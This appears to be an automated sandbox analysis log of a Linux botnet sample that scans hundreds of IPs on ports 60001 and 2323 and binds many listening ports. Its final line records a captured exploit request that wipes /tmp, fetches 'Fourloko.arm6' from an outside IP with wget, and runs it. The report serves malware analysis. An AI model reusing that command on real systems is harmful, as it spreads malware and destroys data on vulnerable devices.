              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.200.28.234:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 107.149.30.29:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.131.251.232:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.239.117.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.60.181.219:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 139.132.128.75:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.136.46.221:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 134.222.111.200:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 90.135.7.219:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 2.137.190.155:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.84.100.182:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.156.239.43:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.30.151.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 125.212.53.222:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.102.43.12:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 143.64.142.93:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.71.172.238:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.235.187.116:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.85.154.66:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.237.172.91:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 202.231.159.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 123.244.142.184:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 31.124.201.150:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 160.216.8.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.111.16.172:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 142.228.82.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 63.194.106.55:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 46.142.39.218:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.225.82.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 193.250.115.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.65.89.102:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 37.206.128.235:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.61.87.96:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.69.15.239:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 210.46.123.184:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.218.249.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 131.138.85.106:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 66.101.58.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.14.122.190:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.2.189.79:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 180.231.149.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 190.22.240.126:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 98.125.105.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.254.67.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.115.164.247:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.63.17.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 221.245.29.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 76.56.12.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.123.168.198:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 141.235.45.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.139.62.201:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.39.226.39:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.12.158.100:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.44.219.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 140.185.162.36:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 174.125.122.106:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.90.94.159:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.210.238.167:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 44.167.16.105:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.82.185.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.219.220.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.20.76.140:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.242.22.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.19.193.18:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 138.34.1.61:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 31.228.86.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.44.164.156:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.208.57.225:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.210.171.132:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 96.185.5.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 73.58.115.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.127.66.117:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.41.110.76:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.239.164.48:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 110.233.190.57:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.91.26.196:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 81.75.13.127:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 79.244.238.232:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 37.63.49.70:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 24.160.233.177:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 34.213.51.225:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.168.12.149:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.80.90.66:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 118.18.141.36:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.25.252.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 4.204.155.119:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 87.37.151.48:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.208.254.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 177.65.107.208:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.75.198.108:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 115.75.158.120:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 123.143.60.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.200.160.84:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 147.69.145.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.218.172.97:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 12.100.118.13:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.53.187.76:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 137.146.155.94:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.62.112.75:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.232.206.197:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.28.228.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 36.135.154.54:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 81.35.97.185:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 161.181.223.130:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 149.231.185.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 44.75.131.194:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 66.61.152.144:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.210.245.101:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.18.245.207:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.112.202.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 220.254.20.205:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 38.207.46.249:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.34.207.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 139.213.143.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.165.17.200:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.149.110.153:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 85.153.76.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.158.254.151:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 176.45.108.176:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.189.185.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 187.180.48.43:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 134.43.34.123:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.93.100.67:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.243.218.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 88.96.210.222:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.14.209.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 142.111.170.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.71.103.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.147.90.119:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.137.10.192:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.232.96.241:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 181.202.151.154:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 219.115.124.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 68.73.6.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 54.208.85.180:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.228.137.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.200.210.201:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 163.233.18.165:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.15.87.155:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.76.241.88:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.248.179.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 51.138.197.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.115.149.199:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.217.244.186:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.87.96.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.187.250.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 63.136.83.166:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 129.26.18.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.243.225.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 159.12.185.140:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 161.125.187.235:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.162.21.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 173.238.102.46:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.98.95.156:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.248.138.157:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.143.97.109:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.114.17.37:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 184.187.33.99:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 70.141.4.246:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 17.45.62.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 8.117.195.53:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.212.152.195:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 147.102.109.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.79.96.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.119.87.6:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.133.50.2:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.27.50.27:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.44.2.31:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.196.141.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.74.161.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 58.29.115.97:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.7.34.142:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 203.237.132.77:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.232.204.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 25.182.187.147:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.118.205.35:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 157.187.153.25:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 125.173.44.85:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 196.176.87.55:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 178.174.72.248:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 35.16.219.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 4.2.179.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 156.187.181.112:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.198.181.24:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 113.215.220.35:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.38.181.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 153.179.86.207:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 213.86.40.169:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.176.234.213:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 187.115.63.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.108.74.42:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.17.154.26:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 160.143.92.117:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.134.159.239:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 190.223.45.85:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.188.62.44:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.89.81.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.241.148.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.45.127.237:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.71.119.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.198.41.31:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 2.74.251.130:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 182.121.193.108:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 126.205.223.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.251.254.132:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 174.26.79.34:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 173.156.81.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 79.203.29.39:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 84.94.29.146:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.101.116.202:60001
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 123.195.104.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 17.70.7.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 74.28.100.202:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 143.32.92.250:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 52.79.231.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 57.112.70.8:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 130.133.22.58:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 169.109.118.134:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 88.208.187.157:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 14.116.233.190:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 4.43.172.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 194.65.212.156:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 70.138.187.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 113.195.150.196:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 95.121.124.186:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 61.70.250.122:2323
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.170.53.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 180.248.8.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 203.176.45.183:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 122.53.132.229:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.49.84.150:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.124.60.252:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 115.52.224.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 60.60.41.162:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 106.172.163.198:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 65.70.167.105:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 111.130.207.205:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.40.96.250:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.163.216.8:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.253.181.187:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 182.98.239.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 58.52.166.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 59.41.45.224:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 158.248.3.160:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 75.166.85.52:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 90.254.115.12:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.163.10.116:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.39.54.122:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 126.60.156.32:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.3.199.170:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 202.27.213.221:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.48.227.88:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.108.144.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 108.246.72.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 96.107.67.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.194.50.89:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 137.131.254.22:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.84.178.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.196.123.217:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.251.244.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.114.253.69:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.110.89.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 158.144.97.195:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.233.19.143:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 39.96.229.246:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.62.185.2:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.18.210.18:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 143.224.144.238:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 120.118.140.160:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 46.115.13.57:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 164.100.7.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.118.223.21:60001
              Source: /tmp/nSg5RM0w0d (PID: 5278) Socket: 127.0.0.1::43829
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::0
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8000
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::9000
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8080
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8081
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::53413
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::52869
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::37215
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::81
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8089
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8088
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8083
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::443
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::4444
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::8001
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::49152
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::40960
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1024
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::1337
              Source: /tmp/nSg5RM0w0d (PID: 5280) Socket: 0.0.0.0::420
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::23
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::0
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::80
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::60001
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8000
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::9000
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8080
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8081
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::53413
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::52869
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::37215
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::81
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8089
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8088
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8083
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::443
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::4444
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::8001
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::49152
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::40960
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1024
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::1337
              Source: /tmp/nSg5RM0w0d (PID: 5286) Socket: 0.0.0.0::420
              Source: /lib/systemd/systemd-journald (PID: 5321) Socket: <unknown socket type>:unknown
              Source: /usr/sbin/gdm3 (PID: 5498) Socket: <unknown socket type>:unknown
              Source: /usr/bin/dbus-daemon (PID: 5527) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5566) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5668) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5746) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5850) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 5925) Socket: <unknown socket type>:unknown
              Source: /lib/systemd/systemd-journald (PID: 6033) Socket: <unknown socket type>:unknown
              Source: unknown Network traffic detected: HTTP traffic on port 36688 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 36686 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 36690 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36690
              Source: unknown Network traffic detected: HTTP traffic on port 36694 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36692
              Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 36692 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36694
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36684
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36686
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36688
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35442
              Source: unknown Network traffic detected: HTTP traffic on port 35442 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 36684 -> 443
              Source: syslog.284.dr String found in binary or memory: https://www.rsyslog.com
              Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
              Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive